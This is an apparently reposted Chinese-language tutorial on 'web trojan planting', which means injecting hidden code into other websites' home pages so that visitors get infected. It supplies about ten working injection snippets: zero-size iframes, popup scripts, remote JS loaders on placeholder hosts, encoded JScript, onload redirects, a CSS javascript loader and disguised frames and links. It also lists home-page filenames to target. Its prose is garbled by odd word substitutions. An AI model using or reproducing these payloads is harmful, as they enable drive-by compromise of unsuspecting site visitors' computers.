网页挂马具体过程教程脚本之家快报 - 千亿集团

网页挂马具体过程教程脚本之家快报

2018-10-21 11:29:14 | 作者: 振平 | 标签: 网页,地址,页面 | 浏览: 367

其实很简略的的,提到原理,就一个:就是在人家网站的主页那里刺进一个自己的网马的页面,等有缝隙的人查看了人家网站的主页,那么他就成了你的肉鸡了。
下面我介绍5种办法,我一个一个介绍
办法一:这个就是最简略的了,只需你懂点html言语
把下面这段代码插进网页中:
<iframe src="这儿换成你的网马的地址" width="0" height="0" frameborder="0"></iframe>
我来刺进,理论上来说插到任何地方都行,仅仅不要把html言语给弄乱了就行
原本没有插进去的页面就是这样,不知道网易那里有没有弹出的广告了,好咱们运转,注意到网页的左下角的网址改变
看到左下角了吧,那里在恳求www.163.com,阐明咱们刺进进去的页面也运转了,哦,还有个弹出的窗口,给我的东西拦了,我来改写一次,看到吧
width="0" height="0" frameborder="0"就是巨细高度的意思,咱们把他设置为零,那咱们就不能看到网页的内容了
看下一种办法,把本来插进去的整理掉先,等下那个文件还要用
办法二:这个就是脚本
<SCRIPT language=javascript>
window.open("https://www.xxx.com/test.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
咱们做网页的时分就会参加许多网页特效,相同咱们也能够用来翻开咱们的网马,那么阅读过机子就会中咱们的网马了~
学过java的都知道上面一段代码的意思了把!翻开网站的一起也就翻开了咱们的https://www.xx.com/test.htm
看咱们插进去
弹出的窗口给拦了,我去掉先,仍是给拦了
晕,有个窗口弹了出来,这姿态的网马是不稳妥的……不过也不失为一种办法
呃~改成0就更大的窗口了,好,办法罢了,仅仅介绍,下一个
办法三:
还有一点就是比较荫蔽的那就是运用js文件
document.write("<iframe width=0 height=0 src=https://xxxxxxx.net/mm1.htm></iframe>");
document.write("<iframe width=0 height=0 src=https://xxxxxxx.net/mm2.htm></iframe>");
咱们没必要挂两个网马,就写一个好了额
方才写错方位了
保存为mm.js,然后在主页里调用js脚本
<script language="javascript" src="</script>https://xxxxxxx.net/mm.js"></script>这个就是调用的代码,从这儿咱们能够看到https://xxxxxxx.net/mm.js,阐明咱们的mm.js文件能够不传到主机上,这样能够便利咱们批量办理咱们挂马,传到咱们的主页空间上就能够了不过我这儿就不传了,就用本地的吧,运转
左下角……调用了163的了,再改写下,看清楚点,OK下一种办法
办法五:
再一种代码就是调用其他网页的页面文件,能够将下面的代码仿制,保存为HTM文件。
<frameset rows="444,0" cols="*">
<frame src="/index.htm" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="help.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
翻开这个网页文件时显现的是index.htm的内容,而实际上还一起执行了help.htm的代码,咱们能够对应
自己生成的木马页和想调用的网页来修正help.htm和index.htm,把它们改成你的文件名就能够了。
这个办法曾经黑防的文章有,我就直讲运用了
我改代码换成其他的页面了,仍是要注意页面的左下角,出错了,重来
看到左下角了吧,再改写一次
看到了吧,仅仅太快就没了
再说下咱们挂马的时分一般选取的页面
咱们选取用来插马的页面一般是网站的主页
比方:index.htm、index.html、index.asp、index.aspx、index.php、index.cgi、index.jsp、default.htm、default.html default.asp default.aspx default.cgi default.jsp default.php等等,咱们就自己记录下来吧,其他页面也能够刺进,只需人家没有打上补丁
一:结构挂马
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首要将以下代码
document.write("<iframe width=0 height=0 src=地址></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCRIPT language="JScript.Encode" src=https://www.xxx.com/muma.txt></script>
muma.txt可改成恣意后缀
四:body挂马
<body onload="window.location=地址;"></body>
五:荫蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + \r\n<iframe src="https://www.xxx.com/muma.htm/"></iframe>;
六:css中挂马
body {
background-image: url(javascript:document.write("<script src=https://www.XXX.net/muma.js></script>"))}
七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:图片假装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:假装调用:
<frameset rows="444,0" cols="*">
<frame src="翻开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高档诈骗
<a href="https://www.163.com(利诱衔接地址,显现这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显现的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表千亿集团立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章